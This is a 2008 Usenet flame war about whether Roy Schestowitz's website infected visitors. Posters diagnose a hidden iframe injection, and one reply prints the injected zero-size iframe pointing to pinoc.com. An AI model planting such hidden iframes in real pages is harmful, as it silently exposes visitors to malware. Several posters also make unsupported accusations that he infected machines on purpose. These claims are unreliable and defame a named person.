WARNING: Roy Schestowitz is spreading virusses on his website, don't go there!!!!!!!!

Dr. Bill

Mar 14, 2008, 12:58:24 PM3/14/08
Roy Schestowitz, a lintard / spammer from cola is spreading virusses.For
instance, when an "Average Joe" windowsuser, who probably wants more
information about Linux, visits it's website, Average Joe's computer gets
infested with a virus / trojan. Great example of Linux advocating in cola.
http://www.angelfire.com/psy/doctorbill/Schestowitz.com.jpg
I'll see to it that Roy Schestowitz is banned through:
http://www.mvps.org/winhelp2002/hosts.htm
<Blocking Unwanted Parasites with a Hosts File>
<Now includes most major parasites , hijackers and unwanted
Adware/Spyware programs!>
This parasite, Roy Schestowitz, has to be banned from the internet.
--
Dr. Bill's ©, Usenet Medical Services ®, First Aid Team [tm].

Moshe Goldfarb

Mar 14, 2008, 2:53:24 PM3/14/08

Other people have been complaining about the same site as well as Roy
Schestowitz's other sites.

http://groups.google.com/group/alt.computer.security/msg/d7057dc9e9db2135

" I posted a message on www.schestowitz.com that was somewhat anti-
linux.
Not only was the message deleted but shortly afterwards I started
getting pings of death from that site. If that wasn't bad enough, I
had a rogue program, testicles.com trying to connect to
www.schestowitz.com.

As if that were not bad enough, I got the same exact results on
another site, www.boycottnovel.com which coincidently is run by the
same person, Roy Schestowitz.

Maybe I am wrong, but I would suggest people avoid those two sites. "

I would put every one of Roy Schestowitz's domains in a hosts block file.

--
Moshe Goldfarb
Please visit The Hall of Linux Idiots:

peterwn

Mar 14, 2008, 3:47:31 PM3/14/08
On Mar 15, 5:58 am, "Dr. Bill" <bill_dctrREMOVET...@yahoo.com> wrote:
> Roy Schestowitz, a lintard / spammer from cola is spreading virusses.For
> instance, when an "Average Joe" windowsuser, who probably wants more
> information about Linux, visits it's website, Average Joe's computer gets
> infested with a virus / trojan. Great example of Linux advocating in >cola.http://www.angelfire.com/psy/doctorbill/Schestowitz.com.jpg

And what is to stop someone wanting to amount a personal attack on Roy
from setting up such bogus sites.

The bigger question that needs to be asked is why Bill Gates and Steve
Ballmer of Microsoft acquiese to Microsoft shills mounting such nasty
personal attacks of this sort.

Moshe Goldfarb

Mar 14, 2008, 3:51:51 PM3/14/08
On Fri, 14 Mar 2008 12:47:31 -0700 (PDT), peterwn wrote:

> On Mar 15, 5:58 am, "Dr. Bill" <bill_dctrREMOVET...@yahoo.com> wrote:
>> Roy Schestowitz, a lintard / spammer from cola is spreading virusses.For
>> instance, when an "Average Joe" windowsuser, who probably wants more
>> information about Linux, visits it's website, Average Joe's computer gets
>> infested with a virus / trojan. Great example of Linux advocating in >cola.http://www.angelfire.com/psy/doctorbill/Schestowitz.com.jpg
>
> And what is to stop someone wanting to amount a personal attack on Roy
> from setting up such bogus sites.

Why bother?

Roy Schestowitz seems to be doing quite well all by himself.

> The bigger question that needs to be asked is why Bill Gates and Steve
> Ballmer of Microsoft acquiese to Microsoft shills mounting such nasty
> personal attacks of this sort.

No that's not the bigger question.
That's your lame attempt to hijack the thread.

Linonut

Mar 14, 2008, 6:23:24 PM3/14/08
* Dr. Bill peremptorily fired off this memo:

Nah, just the wankers who hacked his site and then raced here to COLA to
brag about it.

--
DOS is ugly and interferes with users' experience.
-- Bill Gates

Ant

Mar 14, 2008, 6:27:27 PM3/14/08
"Moshe Goldfarb" wrote:

> On Fri, 14 Mar 2008 17:58:24 +0100, Dr. Bill wrote:
>> Roy Schestowitz, a lintard / spammer from cola is spreading virusses.

> Other people have been complaining about the same site as well as Roy
> Schestowitz's other sites.

The site shows symptoms of having been hacked. There's an invisible
iframe at the end of the page at schestowitz.com which leads to the
now non-resolving pinoc.com:

Domain Name: PINOC.COM
Registrar: ESTDOMAINS, INC.

Registrant:
N/A
Manager (man...@home-made.tv)
Wolfson 25
Rishon-Le-Zion
Ha Merkaz,75203
IL
Tel. +972.525920204

Status:SUSPENDED
Note: This Domain Name is Suspended. In this status the domain name is
InActive and will not function.

Moshe Goldfarb

Mar 14, 2008, 6:33:02 PM3/14/08

You might want to read Roy's posts on the matter.
In fact you might try reading every thing you reply to Linonut because
clearly you have slipped a cog and are just shilling posts from your gang
regardless of their accuracy.

Moshe Goldfarb

Mar 14, 2008, 6:43:32 PM3/14/08

I'm not a programmer but people have been complaining about
www.schestowitz.com and www.boycottnovell.com for quite a while now.

Of course Roy Schestowitz does nothing about this because chances are good,
he is the person who embedded the trojan to begin with.

Google him and decide for yourself.

David H. Lipman

Mar 14, 2008, 7:02:06 PM3/14/08
From: "Ant" <n...@home.today>

| The site shows symptoms of having been hacked. There's an invisible
| iframe at the end of the page at schestowitz.com which leads to the
| now non-resolving pinoc.com:
|
| Domain Name: PINOC.COM
| Registrar: ESTDOMAINS, INC.

Thanx Ant. ESTDomains says it all.

I agree with your conclusion, this site was hacked.

--
Dave

Roy Schestowitz

Mar 14, 2008, 7:03:42 PM3/14/08
____/ Ant on Friday 14 March 2008 22:27 : \____

See:

Hackers Attack Trend Micro

,----[ Quote ]
| Security vendor Trend Micro has fallen victim to a widespread Web attack that
| splashed malicious software onto hundreds of legitimate Web sites in recent
| days.
|
| [...]
|
| Researchers are still not sure how the attackers are managing to hack these
| Web pages, but the pages all seem to use Microsoft's Active Server Page (ASP)
| technology, which is used by many Web development programs to create dynamic
| HTML pages. A software bug in any of those programs is all the attackers need
| to install their malicious code.
`----

http://www.pcworld.com/article/id,143445-c,hackers/article.html

400,000+ infected web pages in a week?!

http://beranger.org/index.php?page=diary&2008/03/14/12/52/22-400-000-infected-web-pages-in-a-

I've _cleaned up my_ Web site (it took a long while). And for trolls who
spreading BS, thousands of sites including big ones like ZDNet are affected.

Hackers launch massive IFRAME attack

,----[ Quote ]
| But Danchev was more pessimistic that the attacks could be halted
| quickly. "To sum up -- it's a mess," he said.
`----

http://www.linuxworld.com.au/index.php?id=26001482&rid=-50

Before accusing individuals, look at the Web as a whole. And if you're using
Windows, be careful of pretty much /ANY/ site you visit. The press is filled
with articles about what became a plague and nobody yet knows how many sites
are really affected.

--
~~ Best of wishes

Roy S. Schestowitz
23:00:03 up 50 days, 8:54, 4 users, load average: 1.96, 1.45, 1.43

Roy Schestowitz

Mar 14, 2008, 7:04:04 PM3/14/08
____/ peterwn on Friday 14 March 2008 19:47 : \____

See:

Hackers Attack Trend Micro

http://www.pcworld.com/article/id,143445-c,hackers/article.html

http://beranger.org/index.php?page=diary&2008/03/14/12/52/22-400-000-infected-web-pages-in-a-

http://www.linuxworld.com.au/index.php?id=26001482&rid=-50

Roy S. Schestowitz | while (!0==1) echo 'Bill Gates' > /dev/null

Sebastian G.

Mar 14, 2008, 7:15:23 PM3/14/08
Roy Schestowitz wrote:

> Before accusing individuals, look at the Web as a whole. And if you're using
> Windows, be careful of pretty much /ANY/ site you visit.

Bullshit. If Mozilla Seamonkey was vulnerable on Windows, it would most
likely also be on Unix and Unix-like OSs.

Only Internet Explorer is vulnerable. And, in fact, by definition this is a
tautology, since IE was never supposed to be secure in an untrusted
environment. Such it's rather the fault of the users who abuse it as a
webbrowser.

The Ghost In The Machine

Mar 14, 2008, 7:18:17 PM3/14/08
In comp.os.linux.advocacy, Moshe Goldfarb
<brick....@gmail.com>
wrote
on Fri, 14 Mar 2008 18:43:32 -0400
<oy37gf11pczp$.zwxx7xpkcun6$.d...@40tude.net>:

> On Fri, 14 Mar 2008 22:27:27 -0000, Ant wrote:

>>> Other people have been complaining about the same site as well as Roy
>>> Schestowitz's other sites.
>>
>> The site shows symptoms of having been hacked. There's an invisible
>> iframe at the end of the page at schestowitz.com which leads to the
>> now non-resolving pinoc.com:
>>
>> Domain Name: PINOC.COM
>> Registrar: ESTDOMAINS, INC.
>>
>> Registrant:
>> N/A
>> Manager (man...@home-made.tv)
>> Wolfson 25
>> Rishon-Le-Zion
>> Ha Merkaz,75203
>> IL
>> Tel. +972.525920204
>>
>> Status:SUSPENDED
>> Note: This Domain Name is Suspended. In this status the domain name is
>> InActive and will not function.
>
> I'm not a programmer but people have been complaining about
> www.schestowitz.com and www.boycottnovell.com for quite a while now.

Where have they (or, for that matter, you) been
complaining? Clearly, if they're complaining here, it's
the wrong forum. Send an email to the uplink, or contact
the appropriate authorities -- probably www.fbi.gov.

I would have thought this obvious but clearly it has yet to
penetrate to those who have been complaining. Get a grip,
people; problems do not go away by themselves. (They can
be ignored, of course, but that simply means one puts horse
blinders on. It doesn't take care of that flashing light.)

BTW...suspension of the domain name does not in itself
inactivate the attack; DNS must also be notified.
Presumably, this has been done, as www.pinoc.com no longer
resolves.

> Of course Roy Schestowitz does nothing about this because chances are good,
> he is the person who embedded the trojan to begin with.
>
> Google him and decide for yourself.

Ah, OK. In that case, submit evidence to the FBI as
well; they'll be *very* interested in hearing of an
infectious vector source -- and will probably initiate
criminal proceedings if there's enough evidence. Of course
you'll also want to submit evidence to the FBI, Interpol,
and the Israeli authorities as well, that there is a
connection between Roy Schestowitz and whoever lives at
the Wolfson 25.

Up to you.

#191, ewi...@earthlink.net
Linux sucks efficiently, but Windows just blows around
a lot of hot air and vapor.

Moshe Goldfarb

Mar 14, 2008, 7:37:47 PM3/14/08
On Fri, 14 Mar 2008 23:03:42 +0000, Roy Schestowitz wrote:

> Before accusing individuals, look at the Web as a whole. And if you're using
> Windows, be careful of pretty much /ANY/ site you visit. The press is filled
> with articles about what became a plague and nobody yet knows how many sites
> are really affected.

Shut up already you fool.
Your site is a trojan site, bottom line.

You, Roy Schestowitz, the stalwart of Linux advocacy have been operating a
site that has been comprimising the systems of people who visit your site.

And if that was not enough, you were warned months ago about this and
refused to do anything.

To me, that says you are behind the entire thing and your sole purpose is
to infect Windows machines.

Nice.
Real nice, Roy Schestowitz.

Moshe Goldfarb

Mar 14, 2008, 7:38:58 PM3/14/08
On Fri, 14 Mar 2008 23:04:04 +0000, Roy Schestowitz wrote:

> Before accusing individuals, look at the Web as a whole. And if you're using
> Windows, be careful of pretty much /ANY/ site you visit. The press is filled
> with articles about what became a plague and nobody yet knows how many sites
> are really affected.

Nobody believe you Roy Schestowitz.
Dance all you want.
Nobody cares.

The fact is you were told about this months ago and did NOTHING to correct
it.

7

Mar 14, 2008, 7:52:04 PM3/14/08
Dr. Bill (Quack! Quack!) the duck fscker (QUAAACKKKhh!!!) wrote on behalf of
Micoshaft Corporation:

Dr. Bill (Quack! Quack!) the duck fscker (QUAAACKKKhh!!!) of
alt.os.windows-xp a wintard / spammer from alt.os.windows-xp
is spreading butt er.

No no no its not butter - its butt er!!!

Don't ask how he does that.
Just use your imagination!

If you feel these useless asstroturfers posting anti-linux messages
sponsored by micoshaft are wasting your time promoting PISTA and other crap,
then do something - go and install some Linux in your PC.

Plenty of LiveCDs here
http://www.livecdlist.com
http://www.distrowatch.com

All free to copy, distribute and install on as many machines
as you like.

If you have olders machines, try DSL, knoppix etc.
If you have modern machines try Ubuntu and games like
Nexuiz - you won't be disappointed.

Linux now owns the territory for fastest games with
highest resolution and higest video frame rates.

Micoshaft and their lame pay to use OS and software
nowhere to be seen.

Dr.Hal0nf1r£$

Mar 14, 2008, 8:33:30 PM3/14/08
Moshe Goldfarb wrote:
> On Fri, 14 Mar 2008 23:03:42 +0000, Roy Schestowitz wrote:
>

>> Before accusing individuals, look at the Web as a whole. And if
>> you're using Windows, be careful of pretty much /ANY/ site you
>> visit. The press is filled with articles about what became a plague
>> and nobody yet knows how many sites are really affected.
>
> Shut up already you fool.
> Your site is a trojan site, bottom line.
>
> You, Roy Schestowitz, the stalwart of Linux advocacy have been
> operating a site that has been comprimising the systems of people who
> visit your site.
>
> And if that was not enough, you were warned months ago about this and
> refused to do anything.
>
> To me, that says you are behind the entire thing and your sole
> purpose is to infect Windows machines.
>
> Nice.
> Real nice, Roy Schestowitz.

Isn't that a standard Linuxfuck tactic?

Moshe Goldfarb

Mar 14, 2008, 8:39:31 PM3/14/08

Maybe I am naive, but I kind of liked to give the Linux advocate the
benefit of the doubt.

In this case however, the flagrant behavior of Roy Schestowitz is obviously
proof of his clandestine motives.

My advice is to avoid www.schestowitz.com and www.boycottnovell.com until
those sites can be cleaned and exterminated of potential bugs.

Sebastian G.

Mar 14, 2008, 8:48:27 PM3/14/08
Moshe Goldfarb wrote:

> On Fri, 14 Mar 2008 23:03:42 +0000, Roy Schestowitz wrote:
>

>> Before accusing individuals, look at the Web as a whole. And if you're using
>> Windows, be careful of pretty much /ANY/ site you visit. The press is filled
>> with articles about what became a plague and nobody yet knows how many sites
>> are really affected.
>
> Shut up already you fool.
> Your site is a trojan site, bottom line.

So is Yahoo. Your point being?

> You, Roy Schestowitz, the stalwart of Linux advocacy have been operating a
> site that has been comprimising the systems of people who visit your site.

1. It is not his site, but the context it includes. That's outside of his
responsibility.
2. The website doesn't magically compromise systems. Only MSIE is affected,
which usage is already a gross fault of the user.

> And if that was not enough, you were warned months ago about this and
> refused to do anything.

Why should he? If the users actively offer a remote shell to every website
they visit, it's their problem.

Dr.Hal0nf1r£$

Mar 14, 2008, 8:50:08 PM3/14/08

I suggest reporting those sites to the writer(s) of Spybot Search and
Destroy updates.

Moshe Goldfarb

Mar 14, 2008, 9:00:04 PM3/14/08

Key word.....
MOTIVE....

Google Schestowitz and then get back to us.

Moshe Goldfarb

Mar 14, 2008, 9:01:06 PM3/14/08

Done.

I was informed that the sites have already been reported so this is a good
thing.

Ant

Mar 14, 2008, 9:23:36 PM3/14/08
"David H. Lipman" wrote:

> Thanx Ant. ESTDomains says it all.
>
> I agree with your conclusion, this site was hacked.

Disappointed that pinoc.com wouldn't resolve. I was hoping to find
some malware to dissect.

BTW, Mr Schestowitz seems a popular figure! If he's associated in any
way with "lintard" (who I presume to be Dave Lindhart, a litigious
spammer) then I'm not surprised at the fuss.

David H. Lipman

Mar 14, 2008, 9:43:50 PM3/14/08
From: "Ant" <n...@home.today>

| Disappointed that pinoc.com wouldn't resolve. I was hoping to find
| some malware to dissect.
|
| BTW, Mr Schestowitz seems a popular figure! If he's associated in any
| way with "lintard" (who I presume to be Dave Lindhart, a litigious
| spammer) then I'm not surprised at the fuss.

I posted about this at MWR. I guess it is a moot point now. :-)

Moshe Goldfarb

Mar 14, 2008, 9:49:22 PM3/14/08

Schestowitz is a 24x7 PAID SPAMMER.

If you look at the number of submissions he has per month, consider he runs
several Microsoft hate blogs, consider the amount of verbiage in his posts,
consider the hours of the day and the time factor between posts on various
sites like digg.com etc.
The only conclusion that can be reached is that Roy Schestowitz is being
compensated for his SPAMMING.

It is very obvious.

John Bokma

Mar 14, 2008, 9:58:19 PM3/14/08
Moshe Goldfarb <brick....@gmail.com> wrote:

> Maybe I am naive

No, you're a fuckwit.

foad

--
John Bokma http://johnbokma.com/

Moshe Goldfarb

Mar 14, 2008, 10:07:28 PM3/14/08
On 15 Mar 2008 01:58:19 GMT, John Bokma wrote:

> Moshe Goldfarb <brick....@gmail.com> wrote:
>
>> Maybe I am naive
>
> No, you're a fuckwit.
>
> foad

Really?
Schestowitz admitted his site was a trojan site.

Learn to read fool.........

Sebastian G.

Mar 14, 2008, 10:40:17 PM3/14/08
Moshe Goldfarb wrote:

> Key word.....
> MOTIVE....

Indeed, he has a motive to not care for what problems stupid visitors have
with third party content included on his site. Then again, almost no one
cares anyway.

Roy Schestowitz

Mar 15, 2008, 12:14:55 AM3/15/08
____/ Sebastian G. on Saturday 15 March 2008 02:40 : \____

I've worked for 2 days on resolving this (it took a long time to handle
100,000+ files). Unlike probably thousands of other Web sites that still have
this iframe problem... (it's nothing to do with the site but a leech-type
reference that get forcibly attached to it).

In the past month there have been many hacking attempts on this domain, coming
from different vectors and scanning for vulnerabilities in difference CMSs
(Advanced Guestbook, Nuke, WordPress, phpBB while others were left alone). On
some days, many thousands of pages were requested by hackers, so there was
clearly a lot of effort going into this.

By the way, there is no "Moshe Goldfarb". It's called "Gary Stewart" (aka
flatfish), a Microsoft Munchkin who has been doing this dirt for over a
decade. Best to just filter out his posts and ignored the smear campaigns and
libel spread about me over the years.

--
~~ Best of wishes

Roy S. Schestowitz | Useless fact: Brazil spans 47.8% of S. America
04:05:01 up 50 days, 13:59, 4 users, load average: 0.81, 1.69, 1.78

RonB

Mar 15, 2008, 1:40:01 AM3/15/08
Anna Banger wrote:

> http://colatrolls.blogspot.com/2008/01/moshe-goldfarb-troll.html
> http://colatrolls.blogspot.com/2007/01/flatfish-troll.html

No shit, Shelock. Now can you quit inundating us with the obvious.

--
RonB
"There's a story there...somewhere"

Paul

Mar 15, 2008, 3:46:47 AM3/15/08
On Fri, 14 Mar 2008 22:07:28 -0400, Moshe Goldfarb
<brick....@gmail.com> wrote:

>On 15 Mar 2008 01:58:19 GMT, John Bokma wrote:
>
>> Moshe Goldfarb <brick....@gmail.com> wrote:
>>
>>> Maybe I am naive
>>
>> No, you're a fuckwit.
>>
>> foad
>
>Really?
>Schestowitz admitted his site was a trojan site.
>
>Learn to read fool.........

Roy is a respected member of this group.
Roy is NOTHING what you say.

May be it is someone pretending to be Roy.
But it ISN'T Roy.

Grow up or Fuck off.

Paul

Mar 15, 2008, 3:51:01 AM3/15/08
On Sat, 15 Mar 2008 04:14:55 +0000, Roy Schestowitz
<newsg...@schestowitz.com> wrote:

>By the way, there is no "Moshe Goldfarb". It's called "Gary Stewart" (aka
>flatfish), a Microsoft Munchkin who has been doing this dirt for over a
>decade. Best to just filter out his posts and ignored the smear campaigns and
>libel spread about me over the years.

Good to see you Roy.
Boy, you sure do pick up some shit-for-brains people :)

Even a dribbling retard knows you better than Microbrain Munchkin and
his paedo-folllowers do.

If you want to start a lible case on this, I will back you up.

plh
Paul

Tim Smith

Mar 15, 2008, 4:10:33 AM3/15/08
In article <2793613.1...@schestowitz.com>,

Roy Schestowitz <newsg...@schestowitz.com> wrote:
> See:
>
> Hackers Attack Trend Micro
>
> ,----[ Quote ]
> | Security vendor Trend Micro has fallen victim to a widespread Web attack
> | that
> | splashed malicious software onto hundreds of legitimate Web sites in recent
> | days.
> |
> | [...]
> |
> | Researchers are still not sure how the attackers are managing to hack these
> | Web pages, but the pages all seem to use Microsoft's Active Server Page
> | (ASP)
> | technology, which is used by many Web development programs to create
> | dynamic
> | HTML pages. A software bug in any of those programs is all the attackers
> | need
> | to install their malicious code.
> `----
>
> http://www.pcworld.com/article/id,143445-c,hackers/article.html
>
> 400,000+ infected web pages in a week?!
>
> http://beranger.org/index.php?page=diary&2008/03/14/12/52/22-400-000-infected-
> web-pages-in-a-
>
> I've _cleaned up my_ Web site (it took a long while). And for trolls who
> spreading BS, thousands of sites including big ones like ZDNet are affected.

(1) You aren't using using ASP, are you? So you *KNOW* that the PCWorld
article is incorrect when it says that all the infected pages seem to
use ASP. So why did you quote it?

(2) Your cleanup failed. You've still got this on your front page:

<iframe src="http://pinoc.com/count.php?o=2" width=0 height=0
style="hidden" frameborder=0 marginheight=0 marginwidth=0
scrolling=no></iframe>

(twice, actually)

--
--Tim Smith

Anonymous

Mar 15, 2008, 7:27:38 AM3/15/08
<bill_dctr...@yahoo.com> wrote:

>Roy Schestowitz, a lintard / spammer from cola is spreading virusses.For
>instance, when an "Average Joe" windowsuser, who probably wants more
>information about Linux, visits it's website, Average Joe's computer gets
>infested with a virus / trojan. Great example of Linux advocating in cola.
>http://www.angelfire.com/psy/doctorbill/Schestowitz.com.jpg

I've got McAfee as well, latest virus definitions have been installed.
I did not get this message after visiting the site
http://www.schestowitz.com/. When do you get it?

chrisv

Mar 15, 2008, 8:41:51 AM3/15/08
Paul wrote:

>On Fri, 14 Mar 2008 22:07:28 -0400, Moshe Goldfarb
>>

>>Learn to read fool.........
>
>Roy is a respected member of this group.
>Roy is NOTHING what you say.
>
>May be it is someone pretending to be Roy.
>But it ISN'T Roy.
>
>Grow up or Fuck off.

He won't. He's been trolling with the same tired act for years.

Just KF the worthless POS and be done with it.

Dr. Bill

Mar 15, 2008, 9:50:40 AM3/15/08
"Anonymous" <nob...@remailer.paranoici.org> schreef in bericht

I have McAfee VirusScan Enterprise v8.5.0i-[full][multlang] on my vista
machine.
http://www.angelfire.com/psy/doctorbill/Schestowitz.com.jpg
After infesting probably 10th of thousands xxxxx machines,
http://www.schestowitz.com/ , is clean for now.
Reading Roy's (fuckhead/SPAMMER) replies, he doesn't fully understand that
HE is responsible to have this site online, so HE's responsible for the
damage done or HE has to build a lawsuit against the hackers, if he isn't
the "hacker" himself.
Roy is a bit angry for some time now. All his actions against Novell, M$
mean nothing. Both companies flourish, do better than ever before. Roy is
losing his battle's and he realizes that fact.
B.t.w. I reported him at: www.microsoft.com / MVP's org / among others.
Microsoft said they are building a strong lawsuit against Roy. This guy is
suicidal and digging his own grave.
--
Dr. Bill's ©, Usenet Medical Services ®, First Aid Team [tm].

Linonut

Mar 15, 2008, 9:55:54 AM3/15/08
* Ant peremptorily fired off this memo:

> "Moshe Goldfarb" wrote:
>
> The site shows symptoms of having been hacked. There's an invisible
> iframe at the end of the page at schestowitz.com which leads to the
> now non-resolving pinoc.com:
>
> Domain Name: PINOC.COM
> Registrar: ESTDOMAINS, INC.
>
> Registrant:
> N/A
> Manager (man...@home-made.tv)
> Wolfson 25
> Rishon-Le-Zion
> Ha Merkaz,75203
> IL
> Tel. +972.525920204
>
> Status:SUSPENDED
> Note: This Domain Name is Suspended. In this status the domain name is
> InActive and will not function.

That entry is borked. The Zip is wrong.

--
If you think your teacher is tough, wait until you get a boss. He doesn't
have tenure.

Linonut

Mar 15, 2008, 9:59:17 AM3/15/08
* Dr.Hal0nf1r£$ peremptorily fired off this memo:

>> To me, that says you are behind the entire thing and your sole
>> purpose is to infect Windows machines.
>>
>> Nice.
>> Real nice, Roy Schestowitz.
>
> Isn't that a standard Linuxfuck tactic?

No.

--
It turns out Luddites don't know how to use software properly, so you should
look into that. -- The reason we come up with new versions is not to fix

Erik Funkenbusch

Mar 15, 2008, 12:57:29 PM3/15/08
On Sat, 15 Mar 2008 04:14:55 +0000, Roy Schestowitz wrote:

> I've worked for 2 days on resolving this (it took a long time to handle
> 100,000+ files). Unlike probably thousands of other Web sites that still have
> this iframe problem... (it's nothing to do with the site but a leech-type
> reference that get forcibly attached to it).

What a wanker you are Roy.

You can sit here and twist all you like, but YOUR SITE WAS COMPROMISED AND
USED TO INFECT OTHERS. Yes, it was something to do with your site. Your
files were infected. That makes YOUR SITE the spreader, regardless of
where the malware was hosted, YOUR SITE was telling browsers to download
it.

> In the past month there have been many hacking attempts on this domain

Way to make yourself feel special, Roy.

*EVERY* IP ADDRESS IN THE WORLD has many hacking attempts made against it,
every single day.

, coming
> from different vectors and scanning for vulnerabilities in difference CMSs
> (Advanced Guestbook, Nuke, WordPress, phpBB while others were left alone). On
> some days, many thousands of pages were requested by hackers, so there was
> clearly a lot of effort going into this.

No, there are clearly a lot of botnets out there attempting to attack
virtually every IP address in the world. You're not special Roy, it
happens to everyone. Get over it.

Linonut

Mar 15, 2008, 12:59:53 PM3/15/08
* Dr. Bill peremptorily fired off this memo:

> I have McAfee VirusScan Enterprise v8.5.0i-[full][multlang] on my vista
> machine.

Ha ha, your machine /needs/ anti-malware measures.

> HE is responsible to have this site online, so HE's responsible for the
> damage done or HE has to build a lawsuit against the hackers, if he isn't
> the "hacker" himself.

Where's K-Man when you need him to rip Dr. Bill a new one for his
supreme silliness?

--
Like almost everyone who uses e-mail, I receive a ton of spam every day.
Much of it offers to help me get out of debt or get rich quick. It would be

Sebastian G.

Mar 15, 2008, 1:05:18 PM3/15/08
Erik Funkenbusch wrote:

> On Sat, 15 Mar 2008 04:14:55 +0000, Roy Schestowitz wrote:
>
>> I've worked for 2 days on resolving this (it took a long time to handle
>> 100,000+ files). Unlike probably thousands of other Web sites that still have
>> this iframe problem... (it's nothing to do with the site but a leech-type
>> reference that get forcibly attached to it).
>
> What a wanker you are Roy.
>
> You can sit here and twist all you like, but YOUR SITE WAS COMPROMISED AND
> USED TO INFECT OTHERS.

There's no indication that his website was compromised. Stating it in big
letters doesn't make any less false.

> That makes YOUR SITE the spreader, regardless of
> where the malware was hosted, YOUR SITE was telling browsers to download
> it.

Wrong as well. The spreaders are the users who advise their system to
automagically install malware downloaded from a website.

chrisv

Mar 15, 2008, 1:26:46 PM3/15/08
chrisv wrote:

> Just KF the worthless POS and be done with it.

*plonk*

Linonut

Mar 15, 2008, 1:29:35 PM3/15/08
* Erik Funkenbusch peremptorily fired off this memo:

> What a wanker you are Roy.
>
> You can sit here and twist all you like, but YOUR SITE WAS COMPROMISED AND
> USED TO INFECT OTHERS. Yes, it was something to do with your site. Your
> files were infected. That makes YOUR SITE the spreader, regardless of
> where the malware was hosted, YOUR SITE was telling browsers to download
> it.
>

> Way to make yourself feel special, Roy.
>
> *EVERY* IP ADDRESS IN THE WORLD has many hacking attempts made against it,
> every single day.
>

> No, there are clearly a lot of botnets out there attempting to attack
> virtually every IP address in the world. You're not special Roy, it
> happens to everyone. Get over it.

Hard to, with you jamming his ass above.

--
Life is not fair; get used to it.
-- Bill Gates

chrisv

Mar 15, 2008, 1:46:44 PM3/15/08
"chrisv" <chr...@nospam.invalid> wrote

> chrisv wrote:
>>
>> Just KF the worthless POS and be done with it.
>
> *plonk*
*plonk* , bro!

KUTLOZE SCHEEFGEPOEPTE

Mar 15, 2008, 1:57:22 PM3/15/08
"Linonut" <lin...@bollsouth.nut> schreef in bericht

>* Dr. Bill peremptorily fired off this memo:
>
>> I have McAfee VirusScan Enterprise v8.5.0i-[full][multlang] on my vista
>> machine.
>
> Ha ha, your machine /needs/ anti-malware measures.
>
>> HE is responsible to have this site online, so HE's responsible for the
>> damage done or HE has to build a lawsuit against the hackers, if he isn't
>> the "hacker" himself.
>
> Where's K-Man when you need him to rip Dr. Bill a new one for his
> supreme silliness?

Oooooh, it's just you: *liarnut* THE Roy Schytsterwitz feltcher, fuck off
you ignorant twat!
Tell your wife and daughter to dump Windows for Linux and they will rip you
apart, you pussy!
BWAHAHAHAHAHAAAH!!, Linux makes you dumb!
--
comp.os.linux.advocacy, COLA, (it's close with COLON) widely known as "The
rectum of usenet".

Erik Funkenbusch

Mar 15, 2008, 2:24:52 PM3/15/08
On Sat, 15 Mar 2008 18:05:18 +0100, Sebastian G. wrote:

> Erik Funkenbusch wrote:
>
>> On Sat, 15 Mar 2008 04:14:55 +0000, Roy Schestowitz wrote:
>>
>>> I've worked for 2 days on resolving this (it took a long time to handle
>>> 100,000+ files). Unlike probably thousands of other Web sites that still have
>>> this iframe problem... (it's nothing to do with the site but a leech-type
>>> reference that get forcibly attached to it).
>>
>> What a wanker you are Roy.
>>
>> You can sit here and twist all you like, but YOUR SITE WAS COMPROMISED AND
>> USED TO INFECT OTHERS.
>
> There's no indication that his website was compromised. Stating it in big
> letters doesn't make any less false.

You mean other than the fact he admitted he spend 2 days cleaning up his
site to get rid of it, going through over 100,000 files?

No, other than that, ther's no indication.

>> That makes YOUR SITE the spreader, regardless of
>> where the malware was hosted, YOUR SITE was telling browsers to download
>

> Wrong as well. The spreaders are the users who advise their system to
> automagically install malware downloaded from a website.

In other words, Roy's website.

Erik Funkenbusch

Mar 15, 2008, 2:26:30 PM3/15/08

Oh, please. His site gets compromised in a standard botnet attack and he
twists to make it seem like he's being targeted explicitly, obviously
because he's such a threat.

You don't see that as paranoia?

chrisv

Mar 15, 2008, 2:30:56 PM3/15/08

Don't *plonk* me, bro!

Linonut

Mar 15, 2008, 2:39:09 PM3/15/08

I don't see the /that/ that you see.

And even in that case, no, it is not paranoia. There are plenty of
COLA-lurking clowns that would have a great time if they could hack
Roy's sites.

And you know it.

--
There never was a chip, it is said, that Bill Gates couldn't slow down with a
new batch of features.

Hadron

Mar 15, 2008, 2:41:30 PM3/15/08
Linonut <lin...@bollsouth.nut> writes:

Not that I expect a liar and fraud like you to understand, but which
part of what Erik said was WRONG Liarnut?

Bottom line : Schestowitz was infecting other peoples computers. And
since it was only Windows machines which got infected it wouldn't
surprise me one bit if there was more to this than meets the eye. He was
told ages ago about this and did NOTHING about it.

And now he starts waffling on about how is ip was attacked? Whoopee
Doo. It happens to everyone on broadband EVERY DAY!

The fact is that he is an incompetent big head with a persecution
complex. Him and Mark Kent have been made to look like the boobies they
are in the past few days.

You should be ashamed of yourself supporting such phonies and
idiots. They do more to harm the Linux cause than MS ever could!

Hadron

Mar 15, 2008, 2:43:22 PM3/15/08
"Sebastian G." <se...@seppig.de> writes:

> Erik Funkenbusch wrote:
>
>> On Sat, 15 Mar 2008 04:14:55 +0000, Roy Schestowitz wrote:
>>
>>> I've worked for 2 days on resolving this (it took a long time to handle
>>> 100,000+ files). Unlike probably thousands of other Web sites that still have
>>> this iframe problem... (it's nothing to do with the site but a leech-type
>>> reference that get forcibly attached to it).
>>
>> What a wanker you are Roy.
>>
>> You can sit here and twist all you like, but YOUR SITE WAS COMPROMISED AND
>> USED TO INFECT OTHERS.
>

> There's no indication that his website was compromised. Stating it in
> big letters doesn't make any less false.

Ok, who are you? Clearly a clueless fool and a nym shift from one of
Roy's fluffers. If his website was not compromised then please ask Roy
what he was doing with his 1000s of files the past 2 days.

>> That makes YOUR SITE the spreader, regardless of
>> where the malware was hosted, YOUR SITE was telling browsers to download
>> it.
>

> Wrong as well. The spreaders are the users who advise their system to
> automagically install malware downloaded from a website.

You means Roy's website?

Hadron

Mar 15, 2008, 2:44:19 PM3/15/08
Linonut <lin...@bollsouth.nut> writes:

> * Dr. Bill peremptorily fired off this memo:
>
>> I have McAfee VirusScan Enterprise v8.5.0i-[full][multlang] on my vista
>> machine.
>
> Ha ha, your machine /needs/ anti-malware measures.

It would seem that so does Roy's web server. Poor Liarnut, becomes more
of a laughing stock every day!

Tim Smith

Mar 15, 2008, 2:45:45 PM3/15/08
In article <1rsjbuemti6ak$.d...@funkenbusch.com>,

Erik Funkenbusch <er...@despam-funkenbusch.com> wrote:
> > I've worked for 2 days on resolving this (it took a long time to handle
> > 100,000+ files). Unlike probably thousands of other Web sites that still
